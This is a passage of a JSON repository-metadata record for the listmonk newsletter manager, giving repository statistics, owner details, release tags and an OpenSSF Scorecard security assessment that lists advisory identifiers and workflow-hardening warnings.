app.","archived":false,"fork":false,"pushed_at":"2026-08-22T08:24:51.000Z","size":52262,"stargazers_count":23109,"open_issues_count":109,"forks_count":2551,"subscribers_count":142,"default_branch":"master","last_synced_at":"2026-08-25T13:49:36.001Z","etag":null,"topics":["campaign","campaign-management","email-marketing","email-subscription","listmonk","mailing-list","newsletter","newsletter-management","newsletter-software","self-hosted","sms-gateway","smtp","transactional-emails"],"latest_commit_sha":null,"homepage":"https://listmonk.app","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/knadh.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2019-06-26T05:08:39.000Z","updated_at":"2026-08-25T13:22:53.000Z","dependencies_parsed_at":"2022-07-12T16:17:41.274Z","dependency_job_id":"71e3fe47-ce35-4f28-872a-148e180d6c82","html_url":"https://github.com/knadh/listmonk","commit_stats":null,"previous_names":[],"tags_count":42,"template":false,"template_full_name":null,"purl":"pkg:github/knadh/listmonk","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/sbom","scorecard":{"id":161421,"data":{"date":"2025-08-11","repo":{"name":"github.com/knadh/listmonk","commit":"38387d007926c2fbc3e0daaf15970dd3f5581f43"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.3,"checks":[{"name":"Code-Review","score":4,"reason":"Found 13/27 approved changesets -- score normalized to 4","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 6 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/build-sanity.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/github-pages.yml:12","Warn: no topLevel permission defined: .github/workflows/issues.yml:1","Warn: topLevel permissions set to 'write-all': .github/workflows/release.yml:8"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU Affero General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/release.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/build-sanity.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/build-sanity.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/github-pages.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:48: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/github-pages.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/github-pages.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/issues.yml:11: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/issues.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release.yml:49: update your workflow using https://app.stepsecurity.io/secureworkflow/knadh/listmonk/release.yml/master?enable=pin","Warn: containerImage not pinned by hash: Dockerfile:1: pin your Docker image by updating alpine:latest to alpine:latest@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:1","Warn: containerImage not pinned by hash: dev/app.Dockerfile:3","Warn: pipCommand not pinned by hash: .github/workflows/github-pages.yml:27","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   7 third-party GitHubAction dependencies pinned","Info:   0 out of   3 containerImage dependencies pinned","Info:   0 out of   1 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v5.0.3 not signed: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 not signed: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 not signed: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 not signed: https://api.github.com/repos/knadh/listmonk/releases/184955432","Warn: release artifact v5.0.3 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/230297465","Warn: release artifact v5.0.2 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/223848166","Warn: release artifact v5.0.1 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/220844848","Warn: release artifact v5.0.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/215270409","Warn: release artifact v4.1.0 does not have provenance: https://api.github.com/repos/knadh/listmonk/releases/184955432"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"SAST","score":2,"reason":"SAST tool is not run on all commits -- score normalized to 2","details":["Warn: 4 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"13 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-w455-mfq9-hf74","Warn: Project is vulnerable to: GHSA-mwcw-c2x4-8c55","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-9hcv-j9pv-qmph","Warn: Project is vulnerable to: GHSA-w9jx-4g6g-rp7x","Warn: Project is vulnerable to: GHSA-438c-3975-5x3f","Warn: Project is vulnerable to: GHSA-5359-pvf2-pw78","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-q7pp-wcgr-pffx"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-16T13:33:46.690Z","repository_id":37385001,"created_at":"2025-08-16T13:33:46.690Z","updated_at":"2025-08-16T13:33:46.690Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36904960,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-25T02:00:06.831Z","response_time":104,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"knadh","name":"Kailash Nadh","uuid":"547147","kind":"user","description":"Hobbyist developer | CTO @zerodha | Volunteer @fossunited @rainmatter-foundation  @indic-archive ","email":"","website":"https://nadh.in","location":"Bengaluru","twitter":null,"company":"Zerodha","icon_url":"https://avatars.githubusercontent.com/u/547147?u=2bfb14ccb1422e941579fc76643fa6765b86fdc9\u0026v=4","repositories_count":66,"last_synced_at":"2024-04-16T23:34:40.781Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/knadh","funding_links":[],"total_stars":24760,"followers":8406,"following":0,"created_at":"2022-11-02T16:51:40.399Z","updated_at":"2024-04-16T23:34:50.910Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/knadh/repositories"},"tags":[{"name":"v6.2.0","sha":"ef0a75872463f10a4848af6c547d1c057405453a","kind":"tag","published_at":"2026-06-26T10:19:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.2.0/manifests"},{"name":"v6.1.0","sha":"1b5e8d38c778e869003486d3c38bc7a964661e91","kind":"tag","published_at":"2026-03-29T13:15:34.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.1.0/manifests"},{"name":"nightly","sha":"85931b7dd02346a8363dc7658aee91316deee534","kind":"commit","published_at":"2026-01-24T07:49:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/nightly","html_url":"https://github.com/knadh/listmonk/releases/tag/nightly","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@nightly","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/nightly/manifests"},{"name":"v6.0.0","sha":"00f303c25b925e2e2b33f515f53a704c8d1e1645","kind":"tag","published_at":"2026-01-02T17:40:18.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v6.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v6.0.0/manifests"},{"name":"v5.1.0","sha":"30846f84154659ad0b365a3d7c9fe2231dd0d3c2","kind":"tag","published_at":"2025-09-09T17:46:02.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.1.0/manifests"},{"name":"v5.0.3","sha":"48643aa93ef6d70afe550d8f526546a4931bf695","kind":"tag","published_at":"2025-07-06T16:11:23.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.3","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e","kind":"tag","published_at":"2025-06-08T09:40:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.2","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"dc466fc76bde033d48af5fe89ffbd84bb7e194d3","kind":"tag","published_at":"2025-05-25T09:45:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"3b8a8c23c586dd7b7851844aae91a370e21ecf35","kind":"tag","published_at":"2025-04-28T18:48:26.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v5.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v5.0.0/manifests"},{"name":"v4.1.0","sha":"0a27de16c6e23b7d4b84d4d91fe59bea10877ad1","kind":"tag","published_at":"2024-11-12T18:40:44.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"f5dfb0cf62f1097545ff315a5c1d9ac540d54b9e","kind":"tag","published_at":"2024-10-28T07:47:30.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"3894571d1ac0b5baa5bcb15a173e4e1020d7a113","kind":"tag","published_at":"2024-10-27T13:25:40.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v4.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"f9120d9b80b1d0d86f27e3f23edfb2ffe6f5b091","kind":"tag","published_at":"2024-02-04T11:18:22.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v3.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v3.0.0/manifests"},{"name":"v2.5.1","sha":"a6a2b6982036eb6bebf9a1ff4d58ff4937ea3af1","kind":"tag","published_at":"2023-08-15T15:46:37.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.1","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"ea2f93ea066bc612b1161ba76324c11c8e495933","kind":"tag","published_at":"2023-08-10T18:32:51.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.5.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.5.0/manifests"},{"name":"v2.4.0","sha":"c668523c570519797e1e7f01958fe830378d253e","kind":"tag","published_at":"2023-03-20T13:48:00.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.4.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.4.0/manifests"},{"name":"v2.3.0","sha":"448f0e3428535bc93bc942c9867183f5adcaf057","kind":"tag","published_at":"2022-11-27T17:50:11.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.3.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"bbbf28c5ce981738c485d6d0e94c89df0fef6763","kind":"tag","published_at":"2022-07-30T18:09:14.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.2.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"0ecfb89f19e63da44df393b08cd2b21f90c79605","kind":"tag","published_at":"2022-02-12T15:24:59.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"05585b701b56a9aa1f1a7f1cdadec44c19541055","kind":"tag","published_at":"2021-09-27T17:57:16.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v2.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v2.0.0/manifests"},{"name":"v1.1.0","sha":"b3612927c82bee987c2c2d20322232b9144a3c8a","kind":"tag","published_at":"2021-06-09T14:43:46.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.1.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"95a81d17ced9766d40447364de12925b51c844fd","kind":"commit","published_at":"2021-05-16T11:24:55.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v1.0.0","html_url":"https://github.com/knadh/listmonk/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v1.0.0/manifests"},{"name":"v0.9.0-beta","sha":"e90fb1d88d15aea4fc7028cd96b1a274f92ab05e","kind":"commit","published_at":"2021-02-13T12:41:10.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.9.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.9.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.9.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.9.0-beta/manifests"},{"name":"v0.8.0-beta","sha":"cde0b4b42a3e0e18b7e08d701e5ca4482cd6fe73","kind":"commit","published_at":"2020-11-10T16:51:25.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.8.0-beta","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.8.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.8.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.8.0-beta/manifests"},{"name":"v0.7.0-alpha","sha":"0f055eacb87030b55970f4870ff3a0b22b0dcaef","kind":"commit","published_at":"2020-08-09T14:32:43.000Z","download_url":"https://codeload.github.com/knadh/listmonk/tar.gz/v0.7.0-alpha","html_url":"https://github.com/knadh/listmonk/releases/tag/v0.7.0-alpha","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/knadh/listmonk@v0.7.0-alpha","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/knadh%2Flistmonk/tags/v0.7.0-alpha/manifests"},{"name":"